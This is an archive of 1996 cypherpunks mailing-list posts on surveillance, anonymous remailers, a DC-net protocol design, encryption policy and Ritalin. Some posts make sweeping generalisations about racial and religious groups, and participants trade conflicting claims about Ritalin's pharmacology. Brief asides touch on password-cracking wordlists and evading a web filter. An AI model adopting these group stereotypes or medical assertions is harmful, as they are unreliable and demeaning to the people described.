Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 8 Jul 1996 19:34:01 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: DEA Intercepts
Message-ID: <199607080850.EAA28667@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  7 Jul 96 at 23:59, Timothy C. May wrote:

> At 9:19 PM 7/7/96, John Young wrote:
[..]
> >   "I don't think J. Edgar Hoover would contemplate what we
> >   can do today in terms of technology," Reno testified during
> >   a Senate hearing in May.

A double-edged quote, isn't it?

[Tim's sort-of techie comments deleted.]

Who needs high-tech for a surveillance state? I remember several 
years back a Soviet-history class that put a lot of emphasis on the 
Czar's totalitarian regime, much of which was already in place when 
the Bolshviks took power (and one of the reasons they held it).
Irregardless of the literacy rate (which I'm guessing was low 
anyway), it was apparently common practice in many European countries 
in the early 19th century (incl. Russia) to have 'black offices' in the post 
offices that would steam open EVERY piece of mail to be read for 
intelligence and surveillance purposes.  And back then there was 
probably a higher proportion of meaningful mail since there was no 
telephone, radio, or (very little) direct-mail marketing.  Generally 
such offices were used for political purposes.  Oddly enough the 
secret police organizations spied heavily on those in power as well: 
sometimes I wonder if Americal political scandals are (or will ever be) 
linked to US intelligence agencies listening in one some pol's calls.

This is akin in some ways to building a postal system where there's a
black office in every station.

Rob.

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 9 Jul 1996 02:33:27 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199607081350.GAA31890@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 8 Jul 96 6:48:30 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
alumni   hal@alumni.caltech.edu           *+*#+*#-*###     3:36 100.00%
replay   remailer@replay.com              **+*******+*     4:23  99.99%
jam      remailer@cypherpunks.ca              ********    16:45  99.98%
c2       remail@c2.org                    +-++++++-+++    46:47  99.97%
nemesis  remailer@meaning.com             +***********    17:25  99.97%
nymrod   nymrod@nym.jpunix.com            #+#-##*#####     2:49  99.97%
lead     mix@zifi.genetics.utah.edu       ++++++++++++    38:37  99.96%
vegas    remailer@vegas.gateway.com       *___.+#*+#*+  4:34:27  99.95%
mix      mixmaster@remail.obscura.com     .------+++++  5:42:01  99.92%
flame    remailer@flame.alias.net         .-++---+--++  3:59:13  99.91%
haystack haystack@holy.cow.net            +###+#* #+##     3:07  99.80%
lucifer  lucifer@dhp.com                  +++ -+++++++    48:41  99.78%
ncognito ncognito@rigel.cyberpass.net     .__.___-...  24:13:12  99.68%
extropia remail@miron.vip.best.com        ----.----.-   7:38:28  99.39%
amnesia  amnesia@chardos.connix.com       ---- -----+   3:42:52  99.31%
alpha    alias@alpha.c2.org               +++*****++++    38:39  99.29%
penet    anon@anon.penet.fi               ...--....-   27:11:56  99.00%
ecafe    cpunk@remail.ecafe.org           --##*  ###    1:26:57  98.73%
portal   hfinney@shell.portal.com         #+*####-  ##     3:52  98.05%
treehole remailer@mockingbird.alias.net   +++- --+  +   2:18:51  97.06%
exon     remailer@remailer.nl.com         **+****  **      4:35  95.60%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Mon, 8 Jul 1996 23:45:45 +0800
To: "Michael H. Warfield" <mhw@wittsend.com>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <m0ubSo0-0000uBC@wittsend.com>
Message-ID: <31E0FC31.4E1C@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael H. Warfield wrote:

> > Scenario: [ naughty parents allow nice kids access to the nasty
> > internet ]

>         Scenario update:  Replace all instances of Bart's computer and
> internet connections with Playboy or Penthouse (or worse - Hustler!)
> magazines found in a drawer in the house.  You then discover this to be 
> the shear and utter gibberish that it really is...

Of course it's a ridiculous situation, but "the Internet" is the Daemon
Du Jour.



______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 8 Jul 1996 22:53:48 +0800
To: WlkngOwl@unix.asb.com>
Subject: Re: NYT/CyberTimes on CWD article
In-Reply-To: <199607071744.NAA25788@unix.asb.com>
Message-ID: <slsD_AK00YUw02Bhw0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 7-Jul-96 Re: NYT/CyberTimes on CWD
a.. by "Deranged Mutant"@unix.a 
> (I wonder if the software can tell that ~perv/ and /users/home/perv/ 
> or /home/perv/ can be the same directory on some systems? That would 
> be an interesting flaw. Has anyone hacked with the software?)

The software can't tell. Take webcom.com, where some ~perv directories
are blocked and some /users/perv directories are blocked by CyberPatrol.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 9 Jul 1996 03:39:55 +0800
To: Arun Mehta <vznuri@netcom.com>
Subject: Re: The Net and Terrorism
Message-ID: <199607081534.IAA07424@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:16 PM 7/8/96 +0500, Arun Mehta wrote:
>India is a large, diverse country with lots of injustice, poverty and other
>problems. When we analyze what breeds terrorism, we find aspects such as:
>
>- Severe neglect by the government (i.e. problems keep getting worse): For
>instance, the north east (which is east of Bangladesh, and has a long
>history of militant opposition) had to agitate for a long time to even get a
>railway line to connect them to the rest of the country.


this is totally back to front.

The primary cause of terrorism, and indeed the primary party guilty of
terrorism in India *is* the government.

For example the war upon the Sikhs started off with government sponsored
terror against Sikh civilians, similar to Krystalnacht.

We mostly see terrorism in countries with a large and intrusive government,
not in countries like Hong Kong where there is massive government "neglect"

>- Disenfranchisement: In Kashmir, most elections were rigged, as the central
>government pretty much admits now.

Oh wow:  So the Muslims of Kashmir were more upset by rigged elections
than by the murder of women and children.

If that is true, why do we not see terror in Hong Kong (no elections until
recently) and Singapore, (rigged elections)

> The US delegation, on the
> other hand, had blacks, different kinds of Asians, Hispanics... and not by
> design -- the US section leadership is highly "mixed", so they did not have
> to think about multiracialism, it just happened.

Pull the other leg.  They even have a black lesbian quota.   US ambassadorships
had gay quota even under Reagan, though not a black lesbian quota.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 9 Jul 1996 05:11:13 +0800
To: cypherpunks@toad.com
Subject: Technology- vs. Human-based Surveillance
Message-ID: <ae06835a01021004e357@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:35 AM 7/8/96, Deranged Mutant wrote:

>Who needs high-tech for a surveillance state? I remember several
>years back a Soviet-history class that put a lot of emphasis on the
>Czar's totalitarian regime, much of which was already in place when
>the Bolshviks took power (and one of the reasons they held it).
...

A human-based surveillance state is very expensive, even by the standards
of modern America and its bloated government. The recent example of the
DDR's "Staasi" provides an example. Hard to hide the extent of the
surveillance when so many people are involved.

Better, think the Thought Police, to use technology to do the intercepts
and pre-screening of the take.

Also, the right technology (right for them, not us) makes widespread
tapping possible, where human-based systems are not. (As but one example,
hard to get human spies into companies on short notice to monitor a
target.) In short, technology-based surveillance is "scalable" in a way
that human-based surveillance is not.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 9 Jul 1996 06:35:56 +0800
To: Arun Mehta <cypherpunks@toad.com
Subject: Re: The Net and Terrorism
Message-ID: <ae0685970202100469db@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Thanks for the fine comments (and the comments from your shrink-wrapped
friend on Ritalin). A very few comments:

At 8:16 AM 7/8/96, Arun Mehta wrote:

>because you were taught hate, doesn't mean you won't outgrow it. My mother
>was active in the freedom struggle against the British, and told me enough
>horror stories that I grew up hating them. But once I met some perfectly
>decent specimens, it evaporated.

This is my experience, too, with using common sense in deciding which
races, if any, to hate.

>India is a large, diverse country with lots of injustice, poverty and other
>problems. When we analyze what breeds terrorism, we find aspects such as:
>
>- Severe neglect by the government (i.e. problems keep getting worse): For
>instance, the north east (which is east of Bangladesh, and has a long
>history of militant opposition) had to agitate for a long time to even get a
>railway line to connect them to the rest of the country.

A case, of course, where the government set the policy on who to connect,
based on votes and influence. In a market economy, regions get connected by
rail when a market for goods to be shipped appears likely, when customers
will pay for tickets, etc. (Until the last several decades, this is the way
railroads and shipping in the U.S. expanded. J.J. Hill built the "Great
Northern" rail line across the northern part of the U.S. without a dime of
subsidy and without much interference by government.)

>- Meddling by politicians: in Punjab, there was a Sikh regional party that
>was quite strong. To erode its popular base, Indira Gandhi encouraged the
>fundamentalists on its right. Similarly, Rajiv Gandhi's government helped
>train the Tamil LTTE. Both paid for these blunders with their lives, at the
>hands of the very groups they had once tried to foster.

This "tactical move" of pitting one religious or ethnic group against
another should be a lesson for the rest of us. Much better to take a
hands-off attitude and essentially pretend that differences don't matter.
(As opposed, say, to giving special privileges to Baptists, blacks,
Catholics, etc.)

In this regard, I think the U.S. got it "right" (though we are drifting
toward a "minority rights" situation, which is sowing the seeds of
Indian-style sectarian conflict, e.g., the riots in Los Angeles a few years
ago).

(Arun is now quoting someone else)
>>The U.S. has a level of tolerance for diversity that I
>>only recently came to
>>appreciate.  We hosted a foreign exchange student from Scotland (hardly
>>culture shock to him), but he surprised me when he commented on how
>>surprised he was that different groups of people were mixed together
>
>I've had a similar experience. I was part of the Indian delegation to a
>couple of Amnesty International International Council meetings. In this
>organisation, multiracialism and multiculturalism are heavily promoted. But
>if you looked at delegations from Europe, even from countries with sizable
>racial minorities, they were typically all-white. The US delegation, on the
>other hand, had blacks, different kinds of Asians, Hispanics... and not by
>design -- the US section leadership is highly "mixed", so they did not have
>to think about multiracialism, it just happened. Of course, given the
>"melting pot" ethos in the US, this is hardly surprising.

Indeed, Americans are often branded as racist yahoos by the enlightened,
racially-tolerant folks of Europe. They cluck at our "racial problems."

However, America is a melting pot, as Arun notes. On a daily basis we
interact with blacks, Asians, Mexicans, whites of all flavors, etc. Blacks,
for example, are very well-represented in so many areas (not science and
technology, for educational/cultural/image reasons--see Note if you want to
hear why).

For anyone who buys the UNESCO line about how American is a fundamentally
racist society, a visit for a few weeks should clarify things. There is
still a lot of racial separation, by choice and not by law, and economic
disparities. But the fact is that the races mix on a daily basis, with
little or no conflict. Music, sports, entertainment, business, etc.

(Note: For various cultural and image reasons, science and technology are
_not_ emphasized as careers for black children. Contrast the image of
science in predominantly black environments with the image of science in,
say, predominantly Jewish environments. The result is clear: blacks are
severely underrepresented in these areas, and Jews are overrepresented in
these same areas. Hey, I'm just citing a basic truth of our times, at least
in this country. Similar statistics apply to Asians, with more than half of
all U.C. Berkeley science and engineering undergrad students being Asian,
and something less than 3% of them being black. The figures for who
_graduates_ are even more skewed. There are various reasons for this. One
of my pet peeves is how the terms "dweeb," "nerd," and "geek" are used to
characterize science and engineering majors and professionals. Hardly terms
that are likely to make a brother in the hood consider studying science!)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@XENON.chromatic.com>
Date: Tue, 9 Jul 1996 07:51:58 +0800
To: "Herb Lin" <hlin@nas.edu>
Subject: Re: SAFE forum -- remarks of Herb Lin
In-Reply-To: <9606058365.AA836589679@nas.edu>
Message-ID: <199607081836.LAA23597@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> My experience with the FBI and other law enforcement officials is that
> they are honorable people trying to do a very hard job.

Very good point.  However, their primary representatives are still Louie
Freeh, Jim Kallstom (sp?) and a few others who specialize in
technologically-inaccurate hype.  They have special backdoor access
priviledges to Congress which none of us have (at least on the scale with
which they can summon).  They do NOT have to answer to anyone, except on
warm and fuzzy Congressional hearings during which the technical inaccuracy
of their words are rarely challenged.

I would give a lot to have a public one-on-one discussion/debate with Freeh
or Kallstrom.  The problem is that they will stick to the obvious sound
bites of "child pornographers" and "terrorists" instead of discussing the
technical issues.

I do agree that, if Freeh and cypherpunks would stop the hyperbole, and
start discussing what would help privacy as well as law enforcement, then
much more useful 

If Freeh and Kallstom played fair, and did not insist on behind-the-scene
lobbying for Digital Telephony and GAK, then I might even consider
compromising my hard-line stance against GAK and encryption regulation.
However, they insisted on pushing it even when they could not get enough
public support.

Right now, THEY have the power, THEY have the access, THEY do not have to
answer to us (and the Devil is always in the details), so I think it is a
bit unfair to say that some cypherpunk is being too harsh on the FBI.

They (the FBI) are supposed to serve us.  Instead, they are taking away
our own control of our lives.  It reminds me much of the power-hungry
MIS suit who swoops in and takes away all of our root passwords without
setting up the backups and the firewalls and add to our productivity.

We can get some solutions for both sides, but it takes work, and Freeh and
Kallstrom (and Clinton) cannot get political credits for these more subtle
solutions, so they must choose between highly-visible (but technically
wrong) solutions and real (but possibly thankless) solutions.  I get the
feeling I know what they are choosing right now.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janke@unixg.ubc.ca
Date: Tue, 9 Jul 1996 08:44:30 +0800
To: cypherpunks@toad.com
Subject: Pseudo-DC-net Project
Message-ID: <199607081845.LAA00269@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I am working on a project to implement a variation of a DC-net to be run
over the Internet. I am posting this summary to find out if it overlaps
with projects others are working on; to see what members of the lists think
of the general ideas for the network I have in mind; and to see if anyone
is interested in helping me out.

The variation of a DC-net I have in mind will vary in three important ways 
from a true DC-net: 

Difference (1) (Pseudo-random numbers) 

It will use pseudo-random numbers in place of true random numbers. 

Difference (2) (Star shaped network)

The graph of the network will be star shaped instead of completely
connected. 

Difference (3) (MACs)

Messages broadcast on the pseudo-DC-net will have a MAC appended in a key 
shared by the channel participants.

Difference (4) (Encryption)

Messages sent to the channel will be encrypted in a key shared by the
participants.

Because of these difference from a true DC-net I will refer to the network
I have in mind as a "pseudo-DC-net". Difference (1) is desirable since
current techniques for generating true random numbers on PC's are slow, and
distribution of the resulting true random numbers is enormously consumptive
in terms of bandwidth. Difference (2) is made possible by the use of
pseudo-random number generators, and is desirable since it reduces the
total number of messages that need to transferred.  Difference (3) is
desirable to identify messages broadcast by unauthorized parties to the
network, and, as a side benefit, to help clients filter out collisions---
when two parties try to broadcast at the same time. Difference (4) is 
desirable so that eavesdroppers cannot determine what messages are 
being broadcast to the network.   

Difference (1) implies a downgrading of the level of anonymity from
unconditional to cryptographic, and difference (2) opens the possibility for
protocol attacks.  

I would like to break this project up into three parts: a formal protocol
specification, a client implementation or implementations, and a server
implementation or implementations. I would like the formal protocol
specification to be publicly available to allow anyone to write their own
clients and servers, and to communicate their criticisms of the protocol.
The protocol will not dictate what pseudo-random number generator is to be
used, although there will be a note of a rule to ensure that pairs of users
are using the same generator for the "coin flips" they share. Similarly,
the protocol should be flexible enough to allow the use of any reasonable
length MAC.  

A general outline of the protocols I have in mind are as follows: 

Protocol (1) (Channel registration protocol) 

Channels will be registered with the server. A channel will be specified by
a time frame in which a pseudo-DC-net is to be run; the IP address and port
to which clients are to connect to join the channel; the length of each
message block to be transmitted to the channel; and a channel ID. 

Protocol (2) (Pseudo-DC-net real-time protocol)

The protocol for running the channel will consist of a series of "rounds". 
Each round will consist of the following steps:

 Step (1) The transmission of a round synchronization number from the server
 to the clients, along with a string of bits specifying the set of users 
 connected. Old clients should make sure that the synchronization number 
 is consistent with the synchronization number of the previous round. 

 Step (2) Receipt by the server from each client of a block of input
 for that round. (If the user does not wish to broadcast, this will be the 
 XOR sum of the next blocks in the the pseudo-random number streams shared 
 by the user with the other users (call this sum S). If the user wishes 
 to broadcast, it will be the encryption of the following: the XOR of S 
 with a message consisting of the concatenation of the channel id, round 
 number, message length, message, message padding, and MAC of these five 
 components.) 

 Step (3) Transmission from the server to each client of the XOR sum of 
 the blocks received.

Protocol (3) (Optional Payment Protocol)

I would like to add the option for the server to charge e-cash for the
administration of the channel.

I have also thought about an extension in which messages to the server
would be signed so that the server could prevent an unauthorized user
from hijacking a connection and disrupting a channel. 

If you would like to help me out with this project, if it overlaps with
something you are already doing or have done, or you just think my ideas
are no good (or good! :) ), please let me know. I am especially interested
in attacks in which the server lies about the round number or set of
connected users. 

If this project is works out well, I would like to later work on protocols 
for voting using a pseudo-DC-net. 

Leonard Janke
(pgp key id 0xF4118611)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBMeFVY0MBIFf0EYYRAQErKwf+OcQjqoODovlRJZtrXuqTGeiRHTobFDa+
DFWEmGl+yditRBt9nAlCgXGiRkCXhqroX30M+SEVw02trc1eBMCeJUSvxB9d0pN6
9x3vDN/XB4Kj6kAuAypulBCa0f74Uim4nJvZDw7boEW/hXY3Yuf7d3mgOsNY/LRT
p62FL24wnz8aeBAVYnE6SJp59u9Yssrvb2lez1IuKIdN8Rqx590Fwn1VBZ2oqGk8
6UucJkvTht7XmKPuckND+Lhq7jv1vVZKZD3NRe4Uy21JstwKwwpuVXVX98YlNc+Y
a15wW4WstZIzsKuPrYVsLsb+wXsETp1sgp5jDkKQABfit7XS8FVC9g==
=KZsI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Adams <eadams@voyager.net>
Date: Tue, 9 Jul 1996 05:02:39 +0800
To: cypherpunks@toad.com
Subject: Computing
Message-ID: <31E15B77.2888@voyager.net>
MIME-Version: 1.0
Content-Type: text/plain


I am a new person here, so I am not directing this message to any specific person.  
Answer freely.

It seems to me that the computing age is advancing too quickly.  I bought an 
excellent Pentium 75Mhz system about one and a half years ago.  Now, I can buy a laptop 
of the same setup for the same price.  I do computer programming and just bought a copy 
of Borland C++ 5.0 for $300.  I expect it to be out-dated very quickly.  I dodn't bother 
with Windows '95, because it is way too buggy and Windows '97 is soon to come.  '95 was 
simply an introduction to what Microshaft can already do.  I don't fall for the daily 
updates, or bug changes, because I know that none of my internet software or printer 
software will run on it.  I wouldn't mind, however, making a program for '95 that would 
make me a few buck$.  I have observed that in the time that the P6 came out, Motorola 
(if that's how you spell it) has signed with another company to make a Gigabyte RAM 
chip.  Won't that be interesting?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Tue, 9 Jul 1996 06:54:55 +0800
To: perry@piermont.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607081725.NAA10514@jekyll.piermont.com>
Message-ID: <199607081628.MAA16827@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text


I've taken Ritalin as both an adult and a child. It is by experiance
not a sedative. It helps me focus more and increase my attention span.

It is as perry indicates a amphetamine. 


> 
> 
> Timothy C. May writes:
> > From what I've read--and I'm no expert, having long had essentially the
> > _opposite_ of "attention deficit disorder," assuming it really even
> > exists!--most children getting Ritalin are just being sedated.
> 
> Speed is not a sedative. Ritalin is amphetamine, not a barbituate. For
> most people, its like drinking lots of coffee -- it seriously
> increases attention and lowers your ability to sleep.
> 
> > Behavior control in its purest form. While the kids stop their
> > wandering attention and constant physical motions, it's because
> > they're in a mental fog, just one step away from drooling.
> 
> Thats not what Ritalin does to *anyone*. If anything, amphetamines are
> abused by people who want to remain awake and alert.
> 
> Perry
> 


-- 
Harry Hawk,     Manager of Interactive Communications
                Warwick Baker O'Neil,  212 941 4438,     habs@warwick.com

"the strength of our liberty depends upon the chaos and cacophony of
the unfettered speech the First Amendment protects" 

"As the most participatory form of mass speech yet developed, the
Internet deserves the highest protection from governmental intrusion"

Philadelphia Federal Judges Panel ( Dolores K. Sloviter, chief judge of
the 3rd U.S. Circuit Court of Appeals, and U.S. District Court Judges
Ronald L. Buckwalter and Stewart Dalzell.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Jul 1996 05:42:17 +0800
To: AwakenToMe@aol.com
Subject: Re: Word lists for passphrases
In-Reply-To: <960706155139_428652398@emout15.mail.aol.com>
Message-ID: <199607081635.MAA10394@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



AwakenToMe@aol.com writes:
>  > > I have a util that will create a word list starting from
>  > > aaaaaaaaaaa on up to anythingggggggg basically you could do every
>  > > combination. Let me know if ya want it.
>  > 
>  > That would really be of great use for doing wordlist crack runs. It
>  > must have taken you a long time to write -- generous of you to offer
>  > it.
>  
>  I want to apologize to everyone for being gratuitously nasty
>  here. It wasn't called for.
>  
> Thats funny. I thought you were being completely serious and I sent you this
> file. You are exactly right. it is of GREAT use for doing wordlist crack
> runs.

If you generate every possible word, you aren't getting any advantage
by using crack and not just trying every possibility in your cracker
itself. The whole point of trying english words is to try to reduce
the search space.  I would try to explain this to you, but it probably
isn't worth while.

Furthermore, generating every possible word is trivial -- its the sort
of assignment you give to kids in their first week of programming. No
one needs to be given such a program -- its only about four or five
lines of C.

> Why dont ya check out some realllyyy secure systems and find out what
> utils they use to test their own security.

Don't teach granpaw to suck eggs, sonny.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Jul 1996 05:57:33 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607070045.RAA24335@netcom5.netcom.com>
Message-ID: <199607081653.MAA10428@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



> tcmay@got.net (Timothy C. May) writes:
> The doublethink and hypocrisy of modern society is
> astounding.
> 
> When the mother (a single mother, as this is California)
> drops her son off with my friend (also single, of course),
> she includes several "Ritalin" capsules with instructions on
> how to dose her son with this depressant/behavior
> modification drug.
> 
> My friend ignores these Ritalins, which upsets the Mom
> greatly the next day when she realizes her son has not been
> given the tranks that are also known as "Mother's little
> helpers."

Ritalin is not a tranquilizer or anything like a tranquilizer. It is
an amphetamine -- it is a close chemical analog to speed and could
only be characterized as a tranquilizer by someone without any
knowledge of the drug or its effects. Most people would become very
"up" on the stuff, but it has a paradoxical, completely reverse effect
on some people who have problems with their dopamine/norephinepherine
(sorry, I may have the spellings wrong) systems in their brains that
cause them to have difficulty focusing or to become hyperactive -- it
calms and focuses such children and adults.

The support newsgroup on Usenet for people with ADD discusses this in
detail.

Most people would have no particular urge to stop a child with
diabetes from taking her insulin. Your friend seems to have the sick
idea that they know better than the child's parents whether the child
should be taking their meds or not, simply because the medication is
for a "mental" problem. This isn't your friend's child. Its someone
else's child. They have no right to make such decisions.

Oh, and by the way, Ritalin has never been known in slang as "mother's
little helper". That would be a tranquilizer taken by the mother to
help her get through her own day.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steven J. Vaughan-Nichols" <Steven.J.Vaughan-Nichols@access.digex.net>
Date: Tue, 9 Jul 1996 05:45:47 +0800
To: cypherpunks@toad.com
Subject: Re: Style gettting in the way of clear reporting
Message-ID: <199607081653.MAA17946@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


May complains loudly about Meek and other writers style.

Meek hardily needs my defense, he's the best in the biz (speaking as 
another writer, I add, damn it!) But, your problem is simply one of 
style, not of substance. Like it or not, Meek does communicate well 
with the vast majority of his readers. His faux-Chandler isn't for 
everyone, but he makes his points loud and clear. 

Steven

Steven J. Vaughan-Nichols            sjvn@access.digex.net
       http://www.access.digex.net/~sjvn/vna.html
QOTD: "You have a job. I work for a living" -- sjvn,
freelance writer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
